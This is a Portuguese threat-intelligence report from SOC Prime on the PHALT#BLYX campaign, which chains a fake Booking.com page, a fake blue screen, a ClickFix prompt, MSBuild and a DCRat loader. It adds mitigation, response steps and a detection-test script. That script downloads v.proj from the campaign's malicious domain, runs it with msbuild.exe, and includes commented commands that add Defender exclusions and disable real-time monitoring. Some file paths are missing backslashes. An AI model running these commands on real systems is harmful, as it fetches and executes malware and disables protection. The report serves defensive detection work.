SOC Prime Bias: Médio

06 Jan 2026 16:06 UTC

Análise do PHALT#BLYX: BSODs Falsos e Ferramentas de Construção Confiáveis em Cadeias de Malware

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Análise do PHALT#BLYX: BSODs Falsos e Ferramentas de Construção Confiáveis em Cadeias de Malware
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

O relatório detalha uma cadeia de intrusão em várias etapas que afeta o setor de hospitalidade, combinando uma página falsa de Booking.com, uma animação enganosa estilo tela azul e um prompt estilo ClickFix para persuadir os usuários a executar um PowerShell dropper. Esse dropper obtém um arquivo de projeto MSBuild, que executa um carregador DCRat personalizado. O carregador altera o Windows Defender, define persistência usando um atalho .url de Inicialização e injeta sua carga útil em processos legítimos. Ao se apoiar em utilitários living-off-the-land como PowerShell e MSBuild.exe, os operadores reduzem traços de malware óbvios. Artefatos em russo na cadeia também são notados como uma pista de atribuição.

Investigação

Os pesquisadores da Securonix mapearam o fluxo de e-mails de phishing oferecendo links de “cancelamento de reserva” a um domínio malicioso, então a uma linha única de PowerShell que localiza msbuild.exe, baixa um arquivo v.proj e o executa. O projeto v.proj realiza várias ações: adiciona exclusões no Windows Defender, baixa staxs.exe (uma variante do DCRat), cria um atalho .url de Inicialização para persistência, e conecta-se à infraestrutura de comando e controle pela porta 3535. O carregador então comprime e injeta a etapa final em aspnet_compiler.exe, usando hollowing de processo para se misturar à atividade legítima.

Mitigação

Reduza a exposição treinando os usuários para reconhecer prompts no estilo ClickFix e engenharia social de “execute este comando para corrigir”. Monitore e restrinja a execução de MSBuild.exe – especialmente quando invocado de locais incomuns ou fluxos de trabalho orientados pelo usuário – e habilite o registro de blocos de script do PowerShell para melhor visibilidade. Adicione detecções para a criação de atalhos na pasta de Inicialização e para modificações nas exclusões do Windows Defender. Na camada de rede, bloqueie o tráfego de saída para os domínios maliciosos identificados e restrinja explicitamente ou alerte sobre egressos suspeitos para o TCP/3535 onde não for necessário.

Resposta

Se a atividade for detectada, isole o host e preserve os principais artefatos, incluindo v.proj, staxs.exe, e quaisquer arquivos de Inicialização .url. Remova exclusões não autorizadas do Defender, encerre processos maliciosos ou injetados, e bloqueie domínios/IPs C2 associados – especialmente quaisquer comunicações pela porta 3535. Redefina credenciais potencialmente expostas, execute uma verificação completa de malware e analise o ambiente para padrões de execução semelhantes dirigidos por MSBuild e comandos PowerShell. Finalmente, implemente detecções informadas por inteligência de ameaças que se concentrem em abuso de MSBuild, comportamento ClickFix, e persistência via atalhos de Inicialização para evitar a recorrência.

Fluxo do Ataque

Execução da Simulação

Pré-requisito: O Check de Pré-Voo de Telemetria e Base deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa refletem diretamente os TTPs identificados e visam gerar exatamente a telemetria esperada pela lógica de detecção.

  • Narrativa e Comandos do Ataque:
    O ator da ameaça abre uma sessão do PowerShell em um endpoint comprometido. Eles localizam primeiro o msbuild.exe binário, então baixam um projeto MSBuild malicioso (v.proj) para C:ProgramData. O atacante imediatamente invoca msbuild.exe para executar a carga útil, que derruba um segundo estágio. Finalmente, eles alteram o Windows Defender adicionando exclusões e desativando o monitoramento em tempo real para garantir persistência.

  • Script de Teste de Regressão:

    # Script de simulação PHALT#BLYX – reproduz atividade de acionamento de detecção
    # --------------------------------------------------------------
    # 1. Localize o msbuild.exe
    $msb = (Get-ChildItem -Path C: -Filter msbuild.exe -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1).FullName
    
    # 2. Baixe o projeto MSBuild malicioso para ProgramData
    $projUrl = "https://2fa-bns.com/v.proj"
    $dest    = "$env:ProgramDatav.proj"
    Invoke-WebRequest -Uri $projUrl -OutFile $dest
    
    # 3. Execute o projeto com msbuild.exe
    & $msb $dest
    
    # 4. Modifique as configurações do Windows Defender (qualquer uma das seguintes satisfará a regra)
    #    Descomente as linhas desejadas para simular as ações do atacante.
    
    # Adicionar caminho de exclusão
    # Add-MpPreference -ExclusionPath "$env:ProgramData"
    
    # Adicionar exclusão para arquivos .exe
    # Add-MpPreference -ExclusionExtension ".exe"
    
    # Adicionar exclusão para arquivos .ps1
    # Add-MpPreference -ExclusionExtension ".ps1"
    
    # Desabilitar monitoramento em tempo real
    # Set-MpPreference -DisableRealtimeMonitoring $true
  • Comandos de Limpeza:

    # Remover o arquivo de projeto baixado
    Remove-Item -Path "$env:ProgramDatav.proj" -Force -ErrorAction SilentlyContinue
    
    # Restaurar monitoramento em tempo real do Windows Defender (se foi desativado)
    Set-MpPreference -DisableRealtimeMonitoring $false
    
    # Remover quaisquer exclusões adicionadas (exemplo para exclusão de caminho)
    Remove-MpPreference -ExclusionPath "$env:ProgramData"
    
    # Opcionalmente excluir quaisquer arquivos restantes criados pela carga útil
    # Remove-Item -Path "C:ProgramDatamalicious_payload.exe" -Force -ErrorAction SilentlyContinue